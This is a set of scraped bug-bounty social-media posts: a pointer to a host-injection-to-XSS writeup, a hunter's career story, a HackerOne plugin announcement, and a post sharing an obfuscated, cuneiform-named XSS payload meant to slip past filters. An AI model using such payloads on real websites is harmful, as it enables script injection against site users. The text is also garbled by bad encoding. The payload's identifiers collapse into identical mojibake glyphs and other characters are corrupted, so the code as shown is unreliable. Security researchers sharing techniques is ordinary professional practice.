For months, my teammate @__r3y4d__ and I hunted on a public program on HackerOne and found dozens of bugs.
We moved on , but coming back for one last check , uncovered a subtle "host injection โ XSS"
Full writeup :
https://t.co/xvNxXnAVvn
In June 2024, I graduated with a CS degree and no plan. 15 months later, I went from unemployed to a full-time bug bounty hunter, collaborating with @moha6894 along the way.
Full story: https://t.co/UORFjPWFtY
#BugBounty#CyberSecurity#Hacking#TogetherWeHitHarder
an XSS payload, Cuneiform-alphabet based
๐='',๐บ=!๐+๐,๐=!๐บ+๐,๐บ=๐+{},๐=๐บ[๐++],
๐=๐บ[๐ซ=๐],๐=++๐ซ+๐,๐น=๐บ[๐ซ+๐],๐บ[๐น+=๐บ[๐]
+(๐บ.๐+๐บ)[๐]+๐[๐]+๐+๐+๐บ[๐ซ]+๐น+๐+๐บ[๐]
+๐][๐น](๐[๐]+๐[๐ซ]+๐บ[๐]+๐+๐+"(๐)")()
#bugbounty#bugbountytips#cybersecurity
.@CaidoIO and @Hacker0x01 are collaborating on a plugin that streamlines the H1 submission process. Weโre envisioning a plugin that gives a simple UI to combine evidence that serves as the foundation of a report and removes most of the writing burden. Link in the comments.